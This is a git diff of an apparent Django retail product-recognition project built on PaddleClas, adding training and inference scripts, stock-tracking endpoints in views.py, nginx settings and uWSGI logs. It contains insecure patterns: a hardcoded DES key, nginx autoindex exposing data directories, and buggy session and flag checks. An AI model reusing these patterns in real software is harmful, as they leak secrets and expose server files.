+ ], + classifiers=[ + 'Intended Audience :: Developers', + 'Operating System :: OS Independent', + 'Natural Language :: Chinese (Simplified)', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.2', + 'Programming Language :: Python :: 3.3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5', + 'Programming Language :: Python :: 3.6', + 'Programming Language :: Python :: 3.7', 'Topic :: Utilities' + ], ) diff --git a/Smart_container/PaddleClas/tools/__init__.py b/Smart_container/PaddleClas/tools/__init__.py new file mode 100644 index 0000000..cdefb80 --- /dev/null +++ b/Smart_container/PaddleClas/tools/__init__.py @@ -0,0 +1,15 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from . import infer \ No newline at end of file diff --git a/Smart_container/PaddleClas/tools/eval.py b/Smart_container/PaddleClas/tools/eval.py new file mode 100644 index 0000000..e086da1 --- /dev/null +++ b/Smart_container/PaddleClas/tools/eval.py @@ -0,0 +1,31 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="eval") + engine.eval() diff --git a/Smart_container/PaddleClas/tools/eval.sh b/Smart_container/PaddleClas/tools/eval.sh new file mode 100644 index 0000000..c13ea6d --- /dev/null +++ b/Smart_container/PaddleClas/tools/eval.sh @@ -0,0 +1,7 @@ +#!/usr/bin/env bash + +# for single card eval +# python3.7 tools/eval.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml + +# for multi-cards eval +python3.7 -m paddle.distributed.launch --gpus="0,1,2,3" tools/eval.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml diff --git a/Smart_container/PaddleClas/tools/export_model.py b/Smart_container/PaddleClas/tools/export_model.py new file mode 100644 index 0000000..01aba06 --- /dev/null +++ b/Smart_container/PaddleClas/tools/export_model.py @@ -0,0 +1,34 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import paddle +import paddle.nn as nn + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="export") + engine.export() diff --git a/Smart_container/PaddleClas/tools/infer.py b/Smart_container/PaddleClas/tools/infer.py new file mode 100644 index 0000000..4f6bf92 --- /dev/null +++ b/Smart_container/PaddleClas/tools/infer.py @@ -0,0 +1,31 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="infer") + engine.infer() diff --git a/Smart_container/PaddleClas/tools/train.py b/Smart_container/PaddleClas/tools/train.py new file mode 100644 index 0000000..1d83590 --- /dev/null +++ b/Smart_container/PaddleClas/tools/train.py @@ -0,0 +1,31 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +from ppcls.utils import config +from ppcls.engine.engine import Engine + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config( + args.config, overrides=args.override, show=False) + engine = Engine(config, mode="train") + engine.train() diff --git a/Smart_container/PaddleClas/tools/train.sh b/Smart_container/PaddleClas/tools/train.sh new file mode 100644 index 0000000..083934a --- /dev/null +++ b/Smart_container/PaddleClas/tools/train.sh @@ -0,0 +1,7 @@ +#!/usr/bin/env bash + +# for single card train +# python3.7 tools/train.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml + +# for multi-cards train +python3.7 -m paddle.distributed.launch --gpus="0,1,2,3" tools/train.py -c ./ppcls/configs/ImageNet/ResNet/ResNet50.yaml diff --git a/Smart_container/app01/.views.py.swn b/Smart_container/app01/.views.py.swn new file mode 100644 index 0000000..33f98e6 Binary files /dev/null and b/Smart_container/app01/.views.py.swn differ diff --git a/Smart_container/app01/__pycache__/__init__.cpython-36.pyc b/Smart_container/app01/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..fabf703 Binary files /dev/null and b/Smart_container/app01/__pycache__/__init__.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/admin.cpython-36.pyc b/Smart_container/app01/__pycache__/admin.cpython-36.pyc new file mode 100644 index 0000000..f48fca5 Binary files /dev/null and b/Smart_container/app01/__pycache__/admin.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/apps.cpython-36.pyc b/Smart_container/app01/__pycache__/apps.cpython-36.pyc new file mode 100644 index 0000000..62ee860 Binary files /dev/null and 
b/Smart_container/app01/__pycache__/apps.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/models.cpython-36.pyc b/Smart_container/app01/__pycache__/models.cpython-36.pyc new file mode 100644 index 0000000..7361063 Binary files /dev/null and b/Smart_container/app01/__pycache__/models.cpython-36.pyc differ diff --git a/Smart_container/app01/__pycache__/views.cpython-36.pyc b/Smart_container/app01/__pycache__/views.cpython-36.pyc new file mode 100644 index 0000000..42b5301 Binary files /dev/null and b/Smart_container/app01/__pycache__/views.cpython-36.pyc differ diff --git a/Smart_container/app01/migrations/0001_initial.py b/Smart_container/app01/migrations/0001_initial.py index 9dc3589..1a86a5e 100644 --- a/Smart_container/app01/migrations/0001_initial.py +++ b/Smart_container/app01/migrations/0001_initial.py @@ -1,4 +1,4 @@ -# Generated by Django 3.2.8 on 2021-11-02 04:32 +# Generated by Django 3.2.8 on 2022-01-26 09:35 from django.db import migrations, models diff --git a/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-38.pyc b/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-36.pyc similarity index 65% rename from Smart_container/app01/migrations/__pycache__/0001_initial.cpython-38.pyc rename to Smart_container/app01/migrations/__pycache__/0001_initial.cpython-36.pyc index 8042efd..06e76e4 100644 Binary files a/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-38.pyc and b/Smart_container/app01/migrations/__pycache__/0001_initial.cpython-36.pyc differ diff --git a/Smart_container/app01/migrations/__pycache__/__init__.cpython-36.pyc b/Smart_container/app01/migrations/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..9786382 Binary files /dev/null and b/Smart_container/app01/migrations/__pycache__/__init__.cpython-36.pyc differ diff --git a/Smart_container/app01/migrations/__pycache__/__init__.cpython-38.pyc 
b/Smart_container/app01/migrations/__pycache__/__init__.cpython-38.pyc deleted file mode 100644 index 22d19fd..0000000 Binary files a/Smart_container/app01/migrations/__pycache__/__init__.cpython-38.pyc and /dev/null differ diff --git a/Smart_container/app01/views.py b/Smart_container/app01/views.py index 0bdd39b..c0df278 100644 --- a/Smart_container/app01/views.py +++ b/Smart_container/app01/views.py @@ -9,12 +9,10 @@ import sys from typing import Container import cv2 -import memcache +#import memcache import numpy as np import pymysql import requests -# 数据库相关操作 -from app01 import models from django.http import HttpResponse, JsonResponse from django.shortcuts import HttpResponse, render #检索 @@ -23,6 +21,9 @@ from fuzzywuzzy import fuzz, process from pyDes import CBC, PAD_PKCS5, des from xpinyin import Pinyin +# 数据库相关操作 +from app01 import models + # Create your views here. KEY='mHAxsLYz' #秘钥 @@ -87,11 +88,13 @@ def information(): temp.append(i.container_name) temp.append(i.container_price) temp.append(i.picture_address) + temp.append(i.stock) container_all.append(temp) return container_all + def update(): container_all = information() os.remove('/root/Smart_container/PaddleClas/dataset/retail/data_update.txt') @@ -122,7 +125,6 @@ def reference(request): sessionID = SKexpired(sessionID, code) image_name = base64.b64decode(value) - image_file = '/root/Smart_container/PaddleClas/dataset/retail/test1.jpg' with open(image_file, "wb") as fh: @@ -135,12 +137,10 @@ def reference(request): price_all = 0.0 - os.system('python3 /root/Smart_container/PaddleClas/deploy/python/predict_system.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_product.yaml -o Global.use_gpu=False') print('234') log_path = '/root/Smart_container/PaddleClas/dataset/log.txt' - with open(log_path, 'r', encoding='utf8') as F: @@ -154,7 +154,6 @@ def reference(request): return JsonResponse({"state": 'true',"container": rec_deplay_str_all}) else: - for str_result in str_result_list: 
price_all = 0 @@ -168,18 +167,22 @@ def reference(request): print(rec_docs_list) - + number_list = [] + for rec_docs_sig in rec_docs_list: for res in res_all: if res.container_name== rec_docs_sig: + temp = [] rec_price = res.container_price price_all += float(rec_price) - rec_docs_price.append(rec_docs_sig) - rec_docs_price.append(rec_price) + number_list.append(res.number) + temp.append(rec_docs_sig) + temp.append(rec_price) + rec_docs_price.append(temp) print(rec_docs_price) os.remove(log_path) - return JsonResponse({"state": 'true',"container": rec_docs_price,"price_all": price_all,"picture_test":'test1.jpg'}) + return JsonResponse({"state": 'true', "number":number_list ,"container": rec_docs_price, "price_all": price_all, "picture_test":'test1.jpg'}) else: return JsonResponse({"state": 'false'}) @@ -226,6 +229,7 @@ def record(request): #增加模块 code = request.POST.get('code') s_container_name = request.POST.get('container_name') #商品名称 str s_container_price = request.POST.get('container_price') #商品单价 float + s_stock = request.POST.get('container_stock') #商品库存 int picture = request.FILES['productimage'] #照片 @@ -233,6 +237,7 @@ def record(request): #增加模块 sessionID = SKexpired(sessionID, code) value_name = s_container_name + print(s_container_name) p = Pinyin() @@ -253,12 +258,16 @@ def record(request): #增加模块 old_container = models.TContainer.objects.filter(container_name=s_container_name) old_container = old_container.values() + print(s_stock) if not bool(old_container): - s_container = models.TContainer(number = s_number, container_name = s_container_name, container_price = s_container_price, picture_address = s_picture_address) + s_container = models.TContainer(number=s_number, container_name=s_container_name, container_price=s_container_price,stock = s_stock, picture_address=s_picture_address) s_container.save() update() + + print("库存为:"+s_stock) + return JsonResponse({"state": 'true', "sessionID": sessionID}) else: @@ -311,11 +320,10 @@ def replace(request): 
#修改模块 code = request.POST.get('code') number = request.POST.get('number') r_container_name = request.POST.get('container_name') - print(r_container_name) r_container_price = request.POST.get('container_price') - print(r_container_price) + r_stock = request.POST.get('container_stock') isimageRevised = request.POST.get('isimageRevised') - print(isimageRevised) + if isimageRevised == True: r_picture = request.FILES['productimage'] @@ -328,16 +336,25 @@ def replace(request): #修改模块 if isSKexpried: sessionID = SKexpired(sessionID, code) - - models.TContainer.objects.filter(number = number).update(container_name = r_container_name) - models.TContainer.objects.filter(number = number).update(container_price = r_container_price) - - g = models.TContainer.objects.filter(number = number) + + numbers = int(number) - result = models.TContainer.objects.filter(number = number) + containers = models.TContainer.objects.all() + + for i in containers: + if i.number == numbers: + stock = i.stock + int(r_stock) + break + + models.TContainer.objects.filter(number=number).update(container_name=r_container_name) + + models.TContainer.objects.filter(number=number).update(container_price=r_container_price) + + models.TContainer.objects.filter(number=number).update(stock=stock) update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) else: @@ -367,6 +384,9 @@ def find(request): #检索模块 code = request.POST.get('code') searchtarget = request.POST.get('searchtarget') + if isSKexpried: + sessionID = SKexpired(sessionID, code) + container = models.TContainer.objects.all() find_result = [] @@ -380,6 +400,7 @@ def find(request): #检索模块 temp.append(i.container_name) temp.append(i.container_price) temp.append(i.picture_address) + temp.append(i.stock) find_result.append(temp) return JsonResponse({"state": 'true', "sessionID": sessionID,"container_all":find_result}) @@ -387,6 +408,52 @@ def find(request): #检索模块 return JsonResponse({"state": 'false'}) +def stock_sale(request): #商品销售 + if 
request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + number_s = request.POST.get('numberlist') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + print(number_s) + + number_s = number_s.split(',') + number_s = list(map(int, number_s)) + print(number_s) + + classify = [] + container_sale = [] + + for i in number_s: + Temp = [] + if i not in classify: + Temp.append(i) + classify.append(i) + temp = 0 + for j in number_s: + if Temp[0] == j: + temp = temp + 1 + Temp.append(temp) + container_sale.append(Temp) + + print(container_sale) + + container = models.TContainer.objects.all() + + for i in container_sale: #[['number','stock'],.....] + for j in container: + if j.number == i[0]: + stock = j.stock - i[1] + models.TContainer.objects.filter(number=i[0]).update(stock=stock) + break + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + def reference_client(request): if request.method == 'POST': diff --git a/Smart_container/conf/nginx/uc_nginx.conf b/Smart_container/conf/nginx/uc_nginx.conf index d182cb2..653bc32 100644 --- a/Smart_container/conf/nginx/uc_nginx.conf +++ b/Smart_container/conf/nginx/uc_nginx.conf @@ -9,12 +9,11 @@ server { # the port your site will be served on listen 80; # the domain name it will serve for -server_name 106.12.78.130; # substitute your machine's IP address or FQDN +server_name 47.100.88.229; # substitute your machine's IP address or FQDN charset utf-8; # max upload size -client_max_body_size 75M; # adjust to taste - +client_max_body_size 75M; # Django media location /media { alias /root/Smart_container/media; # 指向django的media目录 @@ -25,9 +24,19 @@ location /static { } +location /gallery { + root /root/Smart_container/PaddleClas/dataset/retail/; + autoindex on; +} + +location /output{ + root /root/Smart_container/; + autoindex on; +} + # Finally, send all non-media 
requests to the Django server. location / { uwsgi_pass django; - include uwsgi_params; # the uwsgi_params file you installed + include uwsgi_params; # the uwsgi_params file you installed } } diff --git a/Smart_container/conf/uwsgi/Smart_container_uwsgi.log b/Smart_container/conf/uwsgi/Smart_container_uwsgi.log index beca220..ae1dac8 100644 --- a/Smart_container/conf/uwsgi/Smart_container_uwsgi.log +++ b/Smart_container/conf/uwsgi/Smart_container_uwsgi.log @@ -1,10 +1,462 @@ -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:29:39 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 13:41:56 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. 
You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55b62c662520 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55b62c662520 pid: 11136 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 11136) +spawned uWSGI worker 1 (pid: 11138, cores: 1) +spawned uWSGI worker 2 (pid: 11139, cores: 1) +spawned uWSGI worker 3 (pid: 11140, cores: 1) +spawned uWSGI worker 4 (pid: 11141, cores: 1) +spawned uWSGI worker 5 (pid: 11142, cores: 1) +spawned uWSGI worker 6 (pid: 11143, cores: 1) +spawned uWSGI worker 7 (pid: 11144, cores: 1) +spawned uWSGI worker 8 (pid: 11145, cores: 1) +spawned uWSGI worker 9 (pid: 11146, cores: 1) +spawned uWSGI worker 10 (pid: 11147, cores: 1) +spawned uWSGI http 1 (pid: 11148) +[pid: 11146|app: 0|req: 1/1] 210.51.42.187 () {36 vars in 690 bytes} [Wed Nov 10 05:43:17 2021] GET /record/ => generated 18 bytes in 203 msecs (HTTP/1.1 200) 5 headers in 157 bytes (2 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 14:53:58 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! 
+chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x564b27ad7520 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x564b27ad7520 pid: 22104 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 22104) +spawned uWSGI worker 1 (pid: 22106, cores: 1) +spawned uWSGI worker 2 (pid: 22107, cores: 1) +spawned uWSGI worker 3 (pid: 22108, cores: 1) +spawned uWSGI worker 4 (pid: 22109, cores: 1) +spawned uWSGI worker 5 (pid: 22110, cores: 1) +spawned uWSGI worker 6 (pid: 22111, cores: 1) +spawned uWSGI worker 7 (pid: 22112, cores: 1) +spawned uWSGI worker 8 (pid: 22113, cores: 1) +spawned uWSGI worker 9 (pid: 22114, cores: 1) +spawned uWSGI worker 10 (pid: 22115, cores: 1) +spawned uWSGI http 1 (pid: 22116) +[pid: 22113|app: 0|req: 1/1] 210.51.42.187 () {36 vars in 677 bytes} [Wed Nov 10 06:54:30 2021] GET / => generated 179 bytes in 210 msecs (HTTP/1.1 404) 5 headers in 158 bytes (2 switches on core 0) +[pid: 22108|app: 0|req: 1/2] 210.51.42.187 () {36 vars in 691 bytes} [Wed Nov 10 06:54:36 2021] GET /record/ => generated 18 bytes in 204 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 15:04:13 2021] *** 
+compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55f03b054520 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55f03b054520 pid: 23733 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 23733) +spawned uWSGI worker 1 (pid: 23736, cores: 1) +spawned uWSGI worker 2 (pid: 23737, cores: 1) +spawned uWSGI worker 3 (pid: 23738, cores: 1) +spawned uWSGI worker 4 (pid: 23739, cores: 1) +spawned uWSGI worker 5 (pid: 23740, cores: 1) +spawned uWSGI worker 6 (pid: 23741, cores: 1) +spawned uWSGI worker 7 (pid: 23742, cores: 1) +spawned uWSGI worker 8 (pid: 23743, cores: 1) +spawned uWSGI worker 9 (pid: 23744, cores: 1) +spawned uWSGI worker 10 (pid: 23745, cores: 1) +spawned uWSGI http 1 (pid: 23746) +*** 
Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 15:28:36 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 6 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. 
You can enable it with --enable-threads *** +Python main interpreter initialized at 0x56287a594380 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x56287a594380 pid: 28271 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 28271) +spawned uWSGI worker 1 (pid: 28273, cores: 1) +spawned uWSGI worker 2 (pid: 28274, cores: 1) +spawned uWSGI worker 3 (pid: 28275, cores: 1) +spawned uWSGI worker 4 (pid: 28276, cores: 1) +spawned uWSGI worker 5 (pid: 28277, cores: 1) +spawned uWSGI worker 6 (pid: 28278, cores: 1) +spawned uWSGI worker 7 (pid: 28279, cores: 1) +spawned uWSGI worker 8 (pid: 28280, cores: 1) +spawned uWSGI worker 9 (pid: 28281, cores: 1) +spawned uWSGI worker 10 (pid: 28282, cores: 1) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 15:32:41 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! 
+chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x56296bea2510 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x56296bea2510 pid: 28892 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 28892) +spawned uWSGI worker 1 (pid: 28894, cores: 1) +spawned uWSGI worker 2 (pid: 28895, cores: 1) +spawned uWSGI worker 3 (pid: 28896, cores: 1) +spawned uWSGI worker 4 (pid: 28897, cores: 1) +spawned uWSGI worker 5 (pid: 28898, cores: 1) +spawned uWSGI worker 6 (pid: 28899, cores: 1) +spawned uWSGI worker 7 (pid: 28900, cores: 1) +spawned uWSGI worker 8 (pid: 28901, cores: 1) +spawned uWSGI worker 9 (pid: 28902, cores: 1) +spawned uWSGI worker 10 (pid: 28903, cores: 1) +spawned uWSGI http 1 (pid: 28904) +*** Starting uWSGI 2.0.20 (64bit) on [Sun Nov 14 23:18:16 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid 
+detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x560056b0d510 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x560056b0d510 pid: 18988 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 18988) +spawned uWSGI worker 1 (pid: 18990, cores: 1) +spawned uWSGI worker 2 (pid: 18991, cores: 1) +spawned uWSGI worker 3 (pid: 18992, cores: 1) +spawned uWSGI worker 4 (pid: 18993, cores: 1) +spawned uWSGI worker 5 (pid: 18994, cores: 1) +spawned uWSGI worker 6 (pid: 18995, cores: 1) +spawned uWSGI worker 7 (pid: 18996, cores: 1) +spawned uWSGI worker 8 (pid: 18997, cores: 1) +spawned uWSGI worker 9 (pid: 18998, cores: 1) +spawned uWSGI worker 10 (pid: 18999, cores: 1) +spawned uWSGI http 1 (pid: 19000) +SIGINT/SIGTERM received...killing workers... 
